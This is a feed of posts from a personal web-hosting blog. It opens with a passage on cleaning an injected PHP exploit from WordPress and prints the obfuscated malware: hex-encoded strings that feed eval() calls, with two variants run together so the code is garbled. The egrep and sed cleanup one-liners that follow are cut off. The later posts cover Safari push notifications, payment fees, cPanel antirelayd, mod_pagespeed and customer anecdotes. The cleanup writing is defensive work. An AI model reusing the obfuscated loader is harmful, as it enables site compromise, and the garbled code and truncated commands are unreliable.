$faptyzynrt=substr($xcaudxkspk,(36491-26385),(30-23));explode(chr((222-178)),’7136,22,5230,37,5563,29,3206,63,10002,34,7525,68,9945,22,6686,33,2081,56,5331,35,7158,55,1851,57,2867,62,3692,22,9387,35,1725,29,6805,69,8482,23,410,28,2502,22,763,32,5515,28,3054,59,9907,38,3000,54,1205,42,8663,22,8127,51,8178,60,9708,50,6625,36,8505,68,1436,68,4518,57,2697,51,5629,32,1171,34,4107,63,9758,26,8816,41,7484,41,8901,37,5736,29,5890,33,6193,67,558,52,7114,22,2748,62,5543,20,6719,60,7752,47,2629,68,1401,35,8857,44,3664,28,610,69,10082,24,7240,22,9967,35,1311,32,6661,25,8009,66,1537,27,10036,46,2016,42,5366,30,990,52,2524,46,7712,40,5396,26,9627,30,8075,52,2417,51,3420,41,5206,24,4926,26,7433,51,3908,56,795,38,4170,28,3579,40,3964,25,7955,25,1504,33,2189,55,2058,23,5710,26,8685,41,9804,48,2348,69,341,69,3885,23,6928,56,4058,49,4267,46,191,39,159,32,2280,23,7316,51,1122,49,532,26,6582,43,9606,21,4026,32,3845,40,3989,37,6043,28,8386,46,6355,62,5292,39,4486,32,9252,25,7879,42,7367,31,6141,52,5126,52,833,40,3269,34,3355,33,53,54,3182,24,9317,70,3619,45,7213,27,230,62,2137,52,4198,69,4952,65,4456,30,724,39,1564,60,8432,50,8268,48,2468,34,5467,48,7083,31,8573,70,7026,57,9558,48,7683,29,6417,63,3113,69,9277,40,6260,65,8238,30,4860,38,3461,27,5868,22,8337,49,1624,47,6779,26,5789,24,9784,20,0,53,5178,28,4424,32,6984,42,4313,59,6874,54,1276,35,8938,65,4898,28,8316,21,5017,69,7921,34,4575,54,4659,27,7262,54,2971,29,679,45,3785,60,292,49,895,59,7398,35,1042,36,3752,33,9422,68,8794,22,7980,29,4791,69,1816,35,2929,42,1247,29,5813,29,6325,30,4686,57,1671,54,3488,33,5267,25,954,36,5842,26,5592,37,9206,46,1343,58,3388,32,6480,48,5086,40,8726,68,8643,20,107,52,873,22,438,65,5765,24,1754,41,503,29,1962,54,2570,59,6528,54,1908,54,4629,30,9003,66,1078,44,7799,59,3303,52,5978,65,9137,69,5923,55,1795,21,7858,21,3714,38,4372,52,9657,51,2303,45,7593,22,6071,70,9852,55,5422,45,9069,68,9490,68,2810,57,7615,68,2244,36,5661,49,4743,48,3521,58′); $hygsptewnv=substr($intygvhpad,(68724-58618),(27-20)); if (!function_exists(’dzdykdapjx’))(!function_exists(’qgefvbbbeh’)) { function dzdykdapjx($iirlbjafoq, $yzupjbekgp)qgefvbbbeh($tzeljmdfmc, $yxuogarznu) { $wiznxwlvkn$ylbcpzwxzw = NULL; for($lvifcrsvkz=0;$lvifcrsvkz<(sizeof($iirlbjafoq)/2);$lvifcrsvkz++)for($jzkpqbmdpb=0;$jzkpqbmdpb<(sizeof($tzeljmdfmc)/2);$jzkpqbmdpb++) { $wiznxwlvkn$ylbcpzwxzw .= substr($yzupjbekgp, $iirlbjafoq[($lvifcrsvkz*2)],$iirlbjafoq[($lvifcrsvkz*2)+1]);substr($yxuogarznu, $tzeljmdfmc[($jzkpqbmdpb*2)],$tzeljmdfmc[($jzkpqbmdpb*2)+1]); } return $wiznxwlvkn;$ylbcpzwxzw; };} $wxnlzvtcsp=”\x20\57\x2a\40\x6b\162\x67\155\x6f\163\x69\156\x6d\143\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x37\55\x31\67\x30\51\x29\54\x20\143\x68\162\x28\50\x35\65\x31\55\x34\65\x39\51\x29\54\x20\144\x7a\144\x79\153\x64\141\x70\152\x78\50\x24\154\x61\146\x65\172\x63\145\x68\150\x64\54\x24\170\x63\141\x75\144\x78\153\x73\160\x6b\51\x29\51\x3b\40\x2f\52\x20\172\x70\162\x79\157\x67\161\x76\153\x77\40\x2a\57\x20″; $cxvsbyhuqr=substr($xcaudxkspk,(32792-22679),(53-41)); $cxvsbyhuqr($faptyzynrt, $wxnlzvtcsp,$fetzsqsnzm=”\x20\57\x2a\40\x73\152\x63\171\x6f\143\x73\163\x67\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x32\55\x31\71\x35\51\x29\54\x20\143\x68\162\x28\50\x33\62\x35\55\x32\63\x33\51\x29\54\x20\161\x67\145\x66\166\x62\142\x62\145\x68\50\x24\163\x77\150\x71\142\x69\170\x71\161\x62\54\x24\151\x6e\164\x79\147\x76\150\x70\141\x64\51\x29\51\x3b\40\x2f\52\x20\147\x6c\161\x71\161\x73\141\x73\152\x73\40\x2a\57\x20″; $ckixkiunxy=substr($intygvhpad,(63147-53034),(69-57)); $ckixkiunxy($hygsptewnv, $fetzsqsnzm, NULL); $cxvsbyhuqr=$wxnlzvtcsp; $cxvsbyhuqr=(493-372); $xcaudxkspk=$cxvsbyhuqr-1;$ckixkiunxy=$fetzsqsnzm; $ckixkiunxy=(428-307); $intygvhpad=$ckixkiunxy-1; ?>

As you can see from looking at the diff, there is indeed a common signature:

$GLOBALS[“%x61%156%x75%156%x61”]=1

Next, I tried to see if the signature comes up in more files:

egrep -irl '%x61%156%x75%156%x61' ./

The result confirmed my suspicion of a common signature. So next up came the question on how to clean the contaminated files. I build the following code and tested it on one file:

sed -i -e "1s/.*/


This command replaces the first line of a file with the following content:

So next, I combined what I had into the following one-liner:
egrep -irl '%x61%156%x75%156%x61' ./ |xargs sed -i -e "1s/.*/

The code is recursively searching for files with the signature. It starts in the current working directory and replaces the first line of affected files with 
However, this code has problems with theme files, as a lot of .php files do not start off with the same line. So I cleaned up the theme files manually. Whilst this brought back the functionality of the site, I would strongly recommend to harden the security of the entire site and server. Unfortunately I noticed several things while having a first look on the community’s site.
The post Clean WordPress from PHP Exploit P0358 appeared first on sascha.us.



Apple Safari Push Notifications
Sascha Endlicher, M.A. — Mon, 13 Jan 2014 18:06:24 +0000
As you might have noticed when visiting this page, website visitors who are surfing the web with the Safari web browser on Mac OS Mavericks are asked whether they want to receive notifications on future page updates. If you belong to this user group and opt-in for Safari Push Notifications, you will receive an alert as soon as I publish a new article or photo. The notification finally appears in your notification center on the Mac.
I promise not to overdo it with my blog posts and photos and I will not send you spam bombs. In Safari, you can go to Settings > Notifications to see an overview of all push notifications you previously opted-in to.
I have implemented the notification system for this site. I understand that I only reach about 2 % of all web users who visit my site. There are however similar notification features available for other browsers and I will gradually incorporate similar functions for the users of these browsers.
Whilst implementing the notification feature I noticed a possible security breach. Further on, I have some thoughts on improving the system. As an end user, I have a hard time to understand why I can only subscribe to notifications on my mac. I am unable to opt-in for similar notifications on my other iOS devices. This is particularly odd, as Apple is typically widely praised for its consistent user experience. However, this is not the case with website push notifications.
Let’s assume that I activate the notification function on an airline’s website, as I expect that I be notified of any changes to my reserved flight.  However, once I leave the house and while I am on my trip with my mobile iOS devices, I will not be notified of gate changes or any other information that might be beneficial for my trip, unless the website would automatically synchronize the data with a user account in the airline’s app- So if the airline’s company website would send me a push notification, I would only be able to see them on my Mac next time I boot it up. There is clearly room for improvement for v2 of the API.
The post Apple Safari Push Notifications appeared first on sascha.us.



2checkout incurring foreign fees for US customers
Sascha Endlicher, M.A. — Fri, 01 Mar 2013 23:14:05 +0000
I have been made aware this week that 2checkout, a very popular payment processor, is no longer processing payments inside the United States, incurring foreign fees for US customers.
2checkout has moved its processing centers outside the US, to Ireland, Germany, Cyprus, and Hong Kong. For customers from the US, this means that they will be charged for a transaction outside of the United states and their bank will most likely charge them an international transaction fee. These fees will vary by bank and the card that has been used to make payment.
I contacted 2checkout an asked them about this, as I could not find any information on their new corporate payment processing policy. They responded as follows:
We are transacting payments through a new payment processor and we will no longer be using our previous payment processor. The changes that you have noted are going to continue and we have no immediate plans to change this information.
A lot of people making payments through 2checkout are from the US just as a lot of 2checkout sellers are. Payment processing with credit and debit cards is still most popular in North America.
In fact, I would say it is raises ethical questions when a company lists a US and UK business address on their site and no longer processes funds in the US anymore, overnight, out of nowhere.
I wonder if they are warning customers ahead of the charge about possible foreign fees in the checkout process.
(photo by Nick Wheeler)
The post 2checkout incurring foreign fees for US customers appeared first on sascha.us.



cPanel: why /etc/relayhosts is not necessarily evil
Sascha Endlicher, M.A. — Fri, 26 Nov 2010 22:49:24 +0000
Last week one of our customers hired a new webmaster. The new webmaster noticed that one of the dedicated IP addresses assigned to his virtual private server was listed on ips.backscatterer.org.

Of course, the first thing you probably do when you find out that you are blacklisted is: panic!

The train of thoughts associated with this is probably close to this:

“Oh no, I have been blacklisted.”

“Someone must have sent spam from my website.”

“I didn’t send spam and none of my users would!”

“The spam was send without our approval.”

“Someone must have hacked the server.”



Well, in most cases there is still some truth about this. A lot of servers are poorly managed (if someone cares at all) and a lot of the spam that knocks on our doors comes from hijacked webservers.
Not in this case. The customer was apparently not aware that you can get blacklisted with ips.backscatterer.org for running an auto responder on just one of your email accounts.

The problem with this is that auto responders are very popular and widely used in corporate environments. If we follow Google’s KNOL, we might be convinced that they are cool. So since there are a lot of auto responders out there, backscatterer.org is quite busy in blacklisting a lot of IP ranges of service providers who allow their users to have auto responders. As I write this blog post, 154151 IP addresses have been blacklisted by their service. You might wonder why backscatterer.org blocks auto responders in the first place. Well, they try to explain it on their website and whilst they have a few good points, I will leave it up to you to make up your mind on whether auto responders are good for your domain’s users or not. Aside from their decision to block servers using auto responders, this is apparently a lucrative venture for the company behind backscatterer.org. Once blacklisted, you either need to wait 4 weeks to be de-listed or pay a charge of € 75 (a little bit above $100) for an expedited delisting. If you decide that you want to pay, you may wonder who you’re going to do business with. One of the people behind backscatterer.org identifies himself as Claus von Wolfhausen, an apparently highly controversial figure.
Anyway, my point is that our customer got blacklisted for allowing his users to use auto responders, but due to a panic attack, he thought his server was compromised. It’s never a good idea to act when you are panicking.
So our customer logged in to his server and  found the /etc/relayhosts file. He found IP addresses from third party service providers in the file and came to the conclusion that a hacker must have added the IP addresses to the file so that he could relay messages through his VPS.
Whilst this might be a viable conclusion, our customer didn’t do further research to make his case. It was so easy though:
The relayhosts file’s IP addresses are automatically added by antirelayd, a cpanel dameon. It checks /var/log/maillog for pop3 or imap logins and keeps track of valid ones for use with smtp relaying.

POP before SMTP or SMTP after POP is a method of authorization that allows users to send e-mail from any location, as long as they can demonstrably also fetch their mail from the same place.

The IPs in the relayhosts file are automatically removed from the list after a while.
I looked up the suspicious IP addresses he had listed in /var/log/maillog and suggested that he might want to disable POP before SMTP after he gave his users enough time to make the required changes in their clients.
By the way, if you have come to this page because you were looking for a way to disable antirelayd, here we go:
You can either disable it in the Service Configuration section under Service Manager of WHM or by running the following command via shell:
/usr/local/cpanel/bin/tailwatchd --disable=Cpanel::TailWatch::Antirelayd
If you want to double check in shell that it has been disabled, try this:
cat /usr/local/cpanel/logs/tailwatchd_log|grep Antirelay
Watch out for a line that says:
Cpanel::TailWatch::Antirelayd was successfully disabled 
Alternatively, you can check the status of the tailwachd process as follows:
/usr/local/cpanel/bin/tailwatchd --status
The post cPanel: why /etc/relayhosts is not necessarily evil appeared first on sascha.us.



Google’s mod_pagespeed – are you ready for it?
Sascha Endlicher, M.A. — Wed, 17 Nov 2010 23:58:48 +0000
Google recently released mod_pagespeed under an Open Source license. The purpose of this module for the Apache webserver is to optimize content that is delivered by Apache to the end user. You may want to raise your voice at this point and claim that you are already using proper caching techniques on the server side and there is already mod_deflate out there, but mod_pagespeed can be used side by side with mod_deflate and mod_pagespeed is not just about compressing your content.



Further on, you might say that today’s servers are already so fast that it is simply not necessary to fight about milliseconds. Well, Google has apparently a different point of view on this subject and they decided to add a signal to their search algorithm that takes the page load time into account.
So, considering that Google wants you to optimize the speed of your site, what can you do to speed it up? Ironically, the first thing you may want to do is to get rid of Google Analytics. It slows down the page load time significantly and it’s of no good use anyway since Google has decided to allow end users to block the tracking of the Google Analytics code. So since your Google Analytics stats are most likely not accurate any longer and they slow down the page load time, why should you continue to use them? There is no reason to. If you want an accurate analysis, Open Web Analytics is a free alternative that really tracks what you want to keep track of.
Once you got rid of Google Analytics, you may also want to look into installing YSlow, a free tool from Yahoo! that suggests ways to improve a web site’s speed and the Firefox Page Speed extension. Do not confuse the page speed extension with mod_pagespeed!
So what does mod_pagespeed do? Here are two examples of what mod_pagespeed can optimize on the server side:

Caching

The Apache module can set the HTTP response headers in a way that extends the expiry time of static content, such as CSS, images and JavaScript. Once a user accesses your website, his browser fetches the CSS stylesheets, media files and javascripts and stores them in the client side cache. Next time the user returns to the site, the pages will load faster because the browser will not need to reload that static content from the server, as it is read from local cache files.
Minimize Round Trip Times

Each page may require that the browser performs a series of HTTP requests to the server, 1 request for each javascript, media file or css-file. So if you have 10 javascripts and 20 images, this would result on 30 requests. Particularly with CSS and javascript files,  it makes more sense to combine them into fewer streams, eradicating the need for dozens of requests to fetch one HTML page.

So while this module takes over some of the page optimization work, it does not help you with everything that is considered to be a good practice for page optimization nowadays. I assume future releases of the software will enhance the feature list.
The question I have for you as the reader of this blog however is: are you ready for it? Is the software you are using ready for mod_pagespeed? From my web hosting perspective I can tell you that we won’t jump on that ship for shared hosting customers for the following reasons:
1. This is a new software release. It will have bugs. Web hosts don’t like bugs and they do everything to squish them.
2. The module might do more harm than good as far as the server performance goes: what if the extension affects the CPU too much and it crashes servers?
3. The module has not been tested with the most common content management systems and it will probably never be tested. Will it work with Joomla, Drupal, WordPress? What if it breaks one of these or a third party component? Who will support it? (Yeah, I know the answer).
4. As Google itself points out: it might even bring up new security issues.
With all of this in mind: are you ready for it?
The post Google’s mod_pagespeed – are you ready for it? appeared first on sascha.us.



Domain registrations and the little green slimy stickers
Sascha Endlicher, M.A. — Thu, 18 Mar 2010 16:26:02 +0000
Our funniest customer ever is Vincent Navarino. He runs his own blog.
It is always a pleasure for me to read his tickets.
Here is an excerpt:


Heya Sascha!
I have 3-4 domain names I’m not using right now but 2 are up for

renewal the 8th of next month and I want to transfer them all them to

XXXX. Do I sign them up with you guys first and then set the domains

to transfer on their end?
Also I noticed my spambox is always empty [YAY!] and when I went in

Cpanel to check the configuration it said: Invalid license please

contact assp deluxe for cpanel support. (er 11b). [Boo?]
And just as I tried to send you an email through my mail server it

said the connection failed w/the SMTP server. That might be me

although I didn’t change any settings I’m aware of so I’m sending this

via webmail.
-Vincent Navarino
PS. You ever notice when people say how are you at the end of an email

that it seems they’re being a tad disingenuous? Not me. It’s just that

I remember last what’s important most.
My response:
Howdy,
for the domain registrations, I will need to know the EPP code. It is a little green slimy sticker at the bottom of the domain name (you need to turn it upside down and back). Sometimes it also says Authorization code.

I will look into the ASSP license.
Ciao

Sascha
And his follow up response:
Methinks someone is making fun of me with the sticker thing. Which

come to think of is not hard. So I printed out my domain info on my

laser printer, flipped the page up and back as instructed and there

was no EPP code. You mentioned the sticker was green, a color my

monochrome laser printer cannot produce. So I printed it out on my

brother’s color inkjet printer but sadly he was out of GREEN. There

were only 2 cartridges in his printer, so I figured it was the 3 color

cartridge he needed. It had 3 dots on it, none of them green but since

the other one had a black dot and I know black is not the new green it

had to be the 3 dot one needed.
My brother sensing my need to do this, decided to be a super-prick

although he lacks the foundation for such a thing, forced me to pay

$35 at Office Max to get the color cartridge required to print the EPP

code. So $35? and many hammer blows to my brother’s forehead later, I

cleaned up all the blood, dumped his body in a nearby creek and

printed out the domain info again.
No green sticker! I tried my sister’s laser printer (who by the way

was happy to help me with my brother’s body disposal) and still no

green EPP sticker.
Sensing you might have been mocking me with the whole EPP sticker

info, I did a quick Google search and found out for domain xfers you

need an Authorization code. To be sure, I emailed them about how to

find the green EPP sticker on the back of my domain name and they

started laughing at me asking if I knew Sascha. I tried to lie my way

out of it but they weren’t fooled. They offered to make up some green

EPP stickers for my domains and mail them to me but at this point I

was feeling a tad foolish and silly. Sure I was up $20, my

sister-in-law paid me $55 for the ex-hubby thing but the laughing from

those server people made me sad. The gratuitous puppy-kicking and

baby-slapping I did later made me happy enough to make this reply to

you. Well plaid, sir. Well plaid.
The 2 domains I want to xfer now are with 1&1 hosting. I have a

navarinos.com with godaddy but that’s not up for renewal until later

this year. The domains I’d like to xfer now are:

PS. Are the stickers really slimey?? -Vinny
The post Domain registrations and the little green slimy stickers appeared first on sascha.us.



Digging your own internet grave
Sascha Endlicher, M.A. — Wed, 17 Mar 2010 17:14:35 +0000
Now, what a title for a blog relaunch.
Though my blog is supposed to have a few rants, I rarely have the feeling that I have to get on it to complain about something.
Today however, I witnessed the most stupid business decision ever.



I happened to provide search engine optimization services for a plastic surgeon living a few miles just outside of Boston, Massachusetts. My customer was not very internet-savvy and she was used to delegating internet related tasks to other people. Her own website was in fact made by one of her patients clients at the beginning of this millennium. So this former client even paid for her domain registration fees and they had the domain registered through Godaddy. Can you see where this is going? Yes, right, I have been there done that too many times: she lost contact with the person who registered the domain for her, the person in turn forgot to renew the domain and whoops, the website was offline. That alone is bad, especially when you consider Godaddy’s horrible customer support. What made it even worse was that she had a Google ad campaign running at that time and google delivered tons of ads that lead… yes, straight to internet nirvana.
Eventually, she noticed that she was paying for an ad campaign, but didn’t get any new referrals. The weeks after this incident were a nightmare. Godaddy was ridiculously slow and unwilling in helping her to get the domain name back online (were they hoping to collect the redemption fees?). Google punished her domain name so badly that she lost her pagerank, but she couldn’t even run new ad campaigns without having to pay a minimum of $10 per click. In 9 years of search engine marketing and optimization, I have never witnessed something like that.
So once the domain name was finally renewed, we moved it to our registration service for her. I ended up spending hours of my free time on the phone with Google support (they were totally clueless by the way, which clearly opposes the image we have of Google as the search engine giant that hires the most brilliant people in the industry), as I felt bad for the client, even though none of this was really our fault. In the end, someone from Google suggested that we register an alternative domain name for the client and start over from scratch with that name, as the old name was going to be punished for a few more months and there was nothing they could do for us.
A few months later, after we brought her websites to the top 10 worldwide Google search results with white hat SEO techniques for some of her important keywords, she decided that she would like to move on to another service provider. I looked at the work they were doing and I’d say they are passing the line between white hat and black hat SEO. Today we were informed that this new service provider is going to “take over the domain registration” and guess where she is going to have her domain name registered again?
The post Digging your own internet grave appeared first on sascha.us.



New blog online
Sascha Endlicher, M.A. — Sat, 19 Sep 2009 18:40:38 +0000
Welcome to my new blog area based on WordPress. You’ll find snippets of my photography, thoughts and rants, (net) politics or videos in my personal blog. I am posting either via iOs or from a Mac.
The post New blog online appeared first on sascha.us.